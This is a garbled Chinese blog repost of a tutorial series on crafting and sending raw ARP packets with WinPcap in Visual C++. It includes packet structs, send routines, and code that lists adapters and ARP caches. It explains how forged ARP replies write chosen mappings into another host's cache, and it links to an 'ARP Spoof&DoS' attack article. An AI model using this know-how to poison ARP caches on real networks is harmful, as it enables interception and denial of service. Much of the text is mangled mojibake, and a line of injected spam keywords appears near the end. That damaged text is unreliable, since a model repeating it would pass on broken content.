    不做开发的读者，只用下蝲�q�安装这个就可以�?/span> WinPcap auto-installer (driver +DLLs)

   我的原文及源码下载地址�E�后贴出�Q�请��x��本帖 ^_^



     源码下蝲地址�Q�新鲜出炉，非常感谢 _foo 兄弟提供的空�?/font>

http://iunknown.com.cn/csdn/network/ARPPlayer_By_PiggyXP.rar

飞鸟 2007-02-16 15:49 发表评论

飞鸟 — Fri, 16 Feb 2007 07:45:00 GMT

作者：

CSDN VC/MFC �|�络�~�程 PiggyXP ^_^

目录�Q?/font>

二。发送数据包的编�E�实�?/font>

   1. 填充数据�?/font>

   2. 发送数据包

三。一些附加步骤及说明

   1. 如果在VC中��用winpcap

   2. 获得�|�卡信息列表

   3. 获得�pȝ��ARP信息列表

         ................紧接�?/font> �?...............

1.        填充数据�?/span>

下面我�D个填充包头的例子�Q�我首先定义个了一个�{换字�W�的函数�Q�如�?/font>

/****************************************************************************

*   Name & Params::

*             formatStrToMAC

*             (

*                 const LPSTR lpHWAddrStr : 用户输入的MAC地址字符�?/font>

*                 unsigned char *HWAddr :   �q�回的MAC地址字符�?赋给数据包结构体)

*             )

*   Purpose:

*             ��用戯��入的MAC地址字符转成数据包结构体需要的格式

****************************************************************************/

void formatStrToMAC(const LPSTR lpHWAddrStr, unsigned char *HWAddr)

{

       unsigned int i, index = 0, value, temp;

      unsigned char c;

      _strlwr(lpHWAddrStr);                                                 // 转换成小�?/font>

      for (i = 0; i < strlen(lpHWAddrStr); i++)

     {

           c = *(lpHWAddrStr + i);

          if (( c>='0' && c<='9' ) || ( c>='a' && c<='f' ))

           {

               if (c>='0' && c<='9') temp = c - '0';                        // 数字

             if (c>='a' && c<='f') temp = c - 'a' + 0xa;              // 字母

              if ( (index % 2) == 1 )

              {

                   value = value*0x10 + temp;

                   HWAddr[index/2] = value;

              }

              else value = temp;

              index++;

         }

             if (index == 12) break;

        }

}

// 开始填充各个字�D?/font>

ARPPACKET ARPPacket;                                                  // 定义ARPPACKET�l�构体变�?/font>

    memset(&ARPPacket, 0, sizeof(ARPPACKET));                      // 数据包初始化

     formatStrToMAC(“DLC源MAC字符东y�?ARPPacket.dlcHeader.SrcMAC);       // DLC帧头

     formatStrToMAC(“DLC目的MAC字符东y�?ARPPacket.dlcHeader.DesMAC);

     formatStrToMAC(“ARP源MAC字符东y�?ARPPacket.arpFrame.Send_HW_Addr); // 源MAC

     ARPPacket.arpFrame.Send_Prot_Addr = inet_addr(srcIP);             // 源IP

     formatStrToMAC(“ARP目的MAC字符东y�?ARPPacket.arpFrame.Targ_HW_Addr); // 目的MAC

     ARPPacket.arpFrame.Targ_Prot_Addr = inet_addr(desIP);               // 目的IP



     ARPPacket.arpFrame.Opcode = htons((unsigned short)arpType);        // arp包类�?/font>



     // 自动填充的常�?/font>

     ARPPacket.dlcHeader.Ethertype = htons((unsigned short)0x0806); // DLC Header的以太网�c�d��

     ARPPacket.arpFrame.HW_Type = htons((unsigned short)1);           // ��g�c�d��

     ARPPacket.arpFrame.Prot_Type = htons((unsigned short)0x0800);    // 上层协议�c�d��

     ARPPacket.arpFrame.HW_Addr_Len = (unsigned char)6;                 // MAC地址长度

     ARPPacket.arpFrame.Prot_Addr_Len = (unsigned char)4;               // IP地址长度

That’s all ! ^_^

填充完毕之后�Q�我们需要做的就是把我们的ARPPACKET�l�构体发送出�?/font>

2.发送ARP数据包：

我们发送ARP包就要用到winpcap的api了，具体步骤及函数是�q�样的，��Z��单易懂，我把错误处理的地斚w��L��了，详见代码

/**********************************************************************

*    Name & Params::

*             SendARPPacket()

*    Purpose:

*             发送ARP数据�?/font>

*    Remarks:

*             用的是winpcap的api函数

***********************************************************************/

void SendARPPacket()

{

     char *AdapterDeviceName =GetCurAdapterName();     // 首先获得获得�|�卡名字

     lpAdapter = PacketOpenAdapter(AdapterDeviceName);     // �Ҏ��|�卡名字打开�|�卡

     lpPacket = PacketAllocatePacket();               // �l�PACKET�l�构指针分配内存

     PacketInitPacket(lpPacket, &ARPPacket, sizeof(ARPPacket)); //初始化PACKET�l�构指针

                                             // 其中的ARPPacket��是我们先前填充的ARP�?/font>

     PacketSetNumWrites(lpAdapter, 1);               // 每次只发送一个包

     PacketSendPacket(lpAdapter, lpPacket, true)      // Send !!!!! ^_^

     PacketFreePacket(lpPacket);                     // 释放资源

     PacketCloseAdapter(lpAdapter);

}

呵呵�Q�至此，关于ARP包最关键的部分就讲完了，你现在就可以来随心所�Ʋ的发送自��q��ARP包了

既然作�ؓ一��“科普文章”，接下来我再讲一讲与整个��目有关的附加步骤以及说�?/font>

三．附加步骤以及说明

1. 如何�?font face="Times New Roman">VC中��?font face="Times New Roman">winpcap驱动

       虽然winpcap开发包使用��h��非常��便，但是前期准备工作�q�是要费一番功夫的�Q�缺一不可�?font face="Times New Roman">^_^

       首先��是要安装它的驱动程序了�Q�可以到它的主页下蝲�Q�更新很快的

     http://winpcap.polito.it/install/default.htm

     下蝲WinPcap auto-installer (driver +DLLs)�Q�直接安装就好了�Q�或者我提供的代码包里面也有�?/font>

     希望以后用winpcap作开发的朋友�Q�还需要下�?Developer's pack�Q�解压即可�?/font>



        然后�Q�需要设�|�我们工�E�的附加包含目录为我们下载Developer's pack开发包�?font face="Times New Roman">Inclulde目录�Q�连接器的附加依赖库讄��为Developer's pack的lib目录�?/font>

       当然�Q�因为我们的工作比较��单，��是借用winpcap发送数据包而已�Q�所以只用从

winpcap开发包�?font face="Times New Roman">include文�g夹中�Q�拷�?font face="Times New Roman">Packet32.h�Q�到我们的工�E�来�Q��ƈ且包含它��可

以，但是要注意，Packet32.h本��n�q�要包含一�?font face="Times New Roman">Devioctl.h�Q�也要一�q�拷贝进来，当然�q�有�q?/font>

行库Packet.lib�Q�一共就是需要拷�?font face="Times New Roman">3个文件了�Q�如果加入库不用我多说了吧，在工�E�里面设

�|�，或者是在需要它的地方加�?font face="Times New Roman">#pragma comment(lib, "Packet.lib")了�?/font>

        整个��目其实可以分�ؓ四个部分�Q?strong>填充数据包、发送数据包、枚丄��l�网卡列�?/strong>�?/font>

相关信息以及枚�D�pȝ��ARP�~�存列表�Q�下面我再讲一下如何获得系�l�的�|�卡以及ARP�?/font>

表，�q�两个部分都要用�?font face="Times New Roman">IP Helper�?font face="Times New Roman">api�Q�所以要包含以及库文件Iphlpapi.lib�Q?/font>

其实都是很简单的�Q�只用寥寥几行就OK�?/font>

2.     枚�D�pȝ��|�卡以及信息

最好是先定义关于网卡信息的一个结构体�Q�这��h��得结构比较清�?/font>

// �|�卡信息

typedef struct tagAdapterInfo

{

              char szDeviceName[128];           // 名字

              char szIPAddrStr[16];             // IP

              char szHWAddrStr[18];             // MAC

              DWORD dwIndex;                    // �~�号

}INFO_ADAPTER, *PINFO_ADAPTER;

/*********************************************************************

*    Name & Params::

*             AddAdapInfoToList

*             (

*                  CListCtrl& list : CARPPlayerDlg传入的list句柄

*             )

*    Purpose:

*             获得�pȝ��的网卡信息，�q�将其添加到list控�g�?/font>

*    Remarks:

*             获得�|�卡IP及MAC用到了IpHelper api GetAdaptersInfo

******************************************************************/

void AddAdapInfoToList(CListCtrl& list)

{

     char tempChar;

     ULONG uListSize=1;

     PIP_ADAPTER_INFO pAdapter;           // 定义PIP_ADAPTER_INFO�l�构存储�|�卡信息

     int nAdapterIndex = 0;

     DWORD dwRet = GetAdaptersInfo((PIP_ADAPTER_INFO)&tempChar, &uListSize);//关键函数

     if (dwRet == ERROR_BUFFER_OVERFLOW)

     {

PIP_ADAPTER_INFO pAdapterListBuffer = (PIP_ADAPTER_INFO)new(char[uListSize]);

dwRet = GetAdaptersInfo(pAdapterListBuffer, &uListSize);

if (dwRet == ERROR_SUCCESS)

{

     pAdapter = pAdapterListBuffer;

     while (pAdapter)                                              // 枚�D�|�卡然后��相��x��目添加到List�?/font>

     {

        // �|�卡名字

          CString strTemp = pAdapter->AdapterName;

          strTemp = "\\Device\\NPF_" + strTemp;                       // 加上前缀

          list.InsertItem(nAdapterIndex,strTemp);

          strcpy(AdapterList[nAdapterIndex].szDeviceName,strTemp);

          // IP

          strcpy(AdapterList[nAdapterIndex].szIPAddrStr,

                                                 pAdapter->IpAddressList.IpAddress.String );

          list.SetItemText(nAdapterIndex,1,AdapterList[nAdapterIndex].szIPAddrStr);

          // MAC

          formatMACToStr( AdapterList[nAdapterIndex].szHWAddrStr, pAdapter->Address );

          list.SetItemText(nAdapterIndex,2,AdapterLis[nAdapterIndex].szHWAddrStr);

          // �|�卡�~�号

          AdapterList[nAdapterIndex].dwIndex = pAdapter->Index;

          pAdapter = pAdapter->Next;

          nAdapterIndex ++;

          }

     delete pAdapterListBuffer;

     }

}

}

2)获取ARP条目列表

// ARP条目信息

typedef struct tagARPInfo

{

     char szIPAddrStr[16];            // IP

     char szHWAddrStr[18];             // MAC

     DWORD dwType;                     // �c�d��

}INFO_ARP, *PINFO_ARP;

/**********************************************************************

*    Name & Params::

*             AddARPInfoToList

*             (

*                  CListCtrl& list :           CARPPlayerDlg传入的list句柄

*                  const short nAdapterIndex :   用户选中的网卡编�?/font>

*             )

*    Purpose:

*             ��d��pȝ��的ARP�~�存列表,.�q�添加到对话框中

*    Remarks:

*             用到了IpHelper api GetIpNetTable

*             而且用到了WinSock的api�Q�所以要包含

*****************************************************************/

void AddARPInfoToList(CListCtrl& list,const short nAdapterIndex)

{

     char tempChar;

     DWORD dwListSize = 1;

     DWORD dwRet;

     in_addr inaddr;

     list.DeleteAllItems();

     dwRet = GetIpNetTable((PMIB_IPNETTABLE)&tempChar, &dwListSize, TRUE); // 关键函数

     if (dwRet == ERROR_INSUFFICIENT_BUFFER)

     {

         PMIB_IPNETTABLE pIpNetTable = (PMIB_IPNETTABLE)new(char[dwListSize]);

         dwRet = GetIpNetTable(pIpNetTable, &dwListSize, TRUE);

         if (dwRet == ERROR_SUCCESS)

         {

              for (int i=0; i<(int)pIpNetTable->dwNumEntries; i++)

              {

                  // IP

                   inaddr.S_un.S_addr = pIpNetTable->table[i].dwAddr;

                   strcpy( ARPList[i].szIPAddrStr, inet_ntoa(inaddr) );

                   // MAC

                   formatMACToStr( ARPList[i].szHWAddrStr, pIpNetTable->table[i].bPhysAddr );

                   // Type

                   ARPList[i].dwType = pIpNetTable->table[i].dwType;

                   if (AdapterList[nAdapterIndex].dwIndex != pIpNetTable->table[i].dwIndex)                                                       continue;

                   list.InsertItem(i,ARPList[i].szIPAddrStr);

                   list.SetItemText(i,1,ARPList[i].szHWAddrStr);

                   switch(ARPList[i].dwType) {           // �Ҏ��type的值来转换成字�W�显�C?/font>

                   case 3:
                       list.SetItemText(i,2,"Dynamic");
                       break;
                   case 4:
                       list.SetItemText(i,2,"Static");
                       break;
                   case 1:
                       list.SetItemText(i,2,"Invalid");
                   default:
                       list.SetItemText(i,2,"Other");
                   }
              }
         }
         delete pIpNetTable;
     }
}
        �q�样一来，我们基本上大功告成了�Q�其他还有一些东西在�q�里��׃��讲了�Q�大家可以下载我的代码看看就好了�?/font>
        下面我们来用ARP包玩一些小把戏 ^_^�?/font>

飞鸟 2007-02-16 15:45 发表评论

飞鸟 — Fri, 16 Feb 2007 07:41:00 GMT
作者：
   CSDN VC/MFC �|�络�~�程PiggyXP ^_^

目录�Q??xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /?>
    一�Q?span style="FONT: 7pt 'Times New Roman'">    关于 ARP 协议的基��知识

     3. ARP包的填充

二。发送数据包的编�E�实�?/span>

   1.填充数据�?/span>

.........................紧接上文............................

3.ARP 包的填充

1) ��h��包的填充�Q?/font>

     比如我们的电脑MAC地址�?aa-aa-aa-aa-aa-aa�Q�IP�?192.168.0.1

我们惌��查询 192.168.0.99的MAC地址�Q�应该怎么来做呢？

首先填充DLC Header�Q�通过前面的学习我们知道，惌��知道某个计算机对应的MAC地址是要�l�全�|�发送广播的�Q�所�?b>接收方MAC肯定�?ffffffffffff�Q?b>发送方MAC当然是自己啦�Q?/font> 于是我们的DLC Header��填充完成了�Q�如图，加粗的是我们要手动输入的�?当然我编的程序比较智能，会根据你选择的ARP包类型帮你自动填入一些字�D�，你一用便知^_^)�?/font>

DLC Header
字段	长度(Byte)	填充�?/font>
接收方MAC	6	ffffffffffff
发送方MAC	6	aaaaaaaaaaaa
Ethertype	2	0x0806

�? ARP��h��包中 DLC Header内容

接下来是ARP帧，��h��包的操作�?/font>当然�?1,�?font color="#0000ff">送方的MAC以及IP当然填入我们自己的，然后要注意一下，�q�里�?b>接收方IP填入我们要查询的那个IP地址�Q�就�?92.168.0.99了，�?b>接收方MAC填入��L��值就行，不�v作用�Q�于是，如图�Q?/font>

ARP Frame
字段	长度(Byte)	填充�?/font>
��g�c�d��	2	1
上层协议�c�d��	2	0800
MAC地址长度	1	6
IP地址长度	1	4
操作�?/font>	2	1
发送方MAC	6	aaaaaaaaaaaa
发送方IP	4	192.168.0.1
接收方MAC	6	��L��?xxxxxxxxxxxx
接收方IP	4	192.168.0.99
填充数据	18	0

�? ARP��h��包中 ARP帧的内容

如果我们构造一个这��L��包发送出去，如果 192.168.0.99存在且是�z�d��的，我们马上��׃��收到一�?92.168.0.99发来的一个响应包�Q�我们可以查看一下我们的ARP�~�存列表�Q�是不是多了一��类��D��L��?/font> 目：

192.168.0.99 bb-bb-bb-bb-bb-bb

是不是很��奇呢？

我们再来看一下ARP响应包的构�?/font>

2) 响应包的填充

有了前面详细的解��_��你肯定就能自��p��出响应包的填充方法来了吧�Q�所以我��׃��l�说了，列两个表��好�?/font>

比如说给 192.168.0.99�Q�MAC�?bb-bb-bb-bb-bb-bb�Q�发一个ARP响应包，告诉它我们的MAC地址�?aa-aa-aa-aa-aa-aa�Q�就是如此来填充各个字段

DLC Header
字段	长度(Byte)	填充�?/font>
接收方MAC	6	bbbbbbbbbbbb
发送方MAC	6	aaaaaaaaaaaa
Ethertype	2	0x0806

�? ARP响应包中 DLC Header内容

ARP Frame
字段	长度(Byte)	填充�?/font>
��g�c�d��	2	1
上层协议�c�d��	2	0800
MAC地址长度	1	6
IP地址长度	1	4
操作�?/font>	2	2
发送方MAC	6	aaaaaaaaaaaa
发送方IP	4	192.168.0.1
接收方MAC	6	bbbbbbbbbbbb
接收方IP	4	192.168.0.99
填充数据	18	0

�? ARP响应包中 ARP帧的内容

�q�样192.168.0.99的ARP�~�存中就会多了一条关于我�?92.168.0.1的地址映射�?/font>

好了�Q�终于到了编�E�实现它的时候了^_^

二．发�?/span> ARP 包的�~�程实现

1. 填充数据�?/span>

上面的那些关�?/span> ARP 包各个字�D늚�表格�Q�对应在�E�序里就是结构体�Q?/span> 对应于上面的表格�Q?/span> 于是我们需要三个下面这��L��l�构�?/span>

// DLC Header

typedef struct tagDLCHeader

{

unsigned char DesMAC[6]; /* destination HW addrress */

unsigned char SrcMAC[6]; /* source HW addresss */

unsigned short Ethertype; /* ethernet type */

} DLCHEADER, *PDLCHEADER;

// ARP Frame

typedef struct tagARPFrame

{

unsigned short HW_Type; /* hardware address */

unsigned short Prot_Type; /* protocol address */

unsigned char HW_Addr_Len; /* length of hardware address */

unsigned char Prot_Addr_Len; /* length of protocol address */

unsigned short Opcode; /* ARP/RARP */

unsigned char Send_HW_Addr[6]; /* sender hardware address */

unsigned long Send_Prot_Addr; /* sender protocol address */

unsigned char Targ_HW_Addr[6]; /* target hardware address */

unsigned long Targ_Prot_Addr; /* target protocol address */

unsigned char padding[18];

} ARPFRAME, *PARPFRAME;

// ARP Packet = DLC header + ARP Frame

typedef struct tagARPPacket

{

DLCHEADER dlcHeader;

ARPFRAME arpFrame;

} ARPPACKET, *PARPPACKET;

�q�些�l�构体一定能看懂�?/span> 在程序中��是对号入�񔞮�好�?/span>

飞鸟 2007-02-16 15:41 发表评论

飞鸟 — Fri, 16 Feb 2007 07:39:00 GMT

摘要: �? �a� ... 阅读全文

飞鸟 2007-02-16 15:39 发表评论

发送方MAC	6	随便乱填一个错误的
发送方IP	4	填上你的IP

亚洲精品无码成人,亚洲国产国产综合一区首页,亚洲国产精品综合久久20

PE文�g�l�构

调试Release版本应用�E�序

ActiveSkin 4.3 软�g换肤

bmp转JPG

ARP Spoof&DoS��d���~�程实战

�Q��{�Q�手把手教你玩�{ARP包（完）【数据包的游戏系列之一�?

ARP Spoof&DoS��d��~�程实战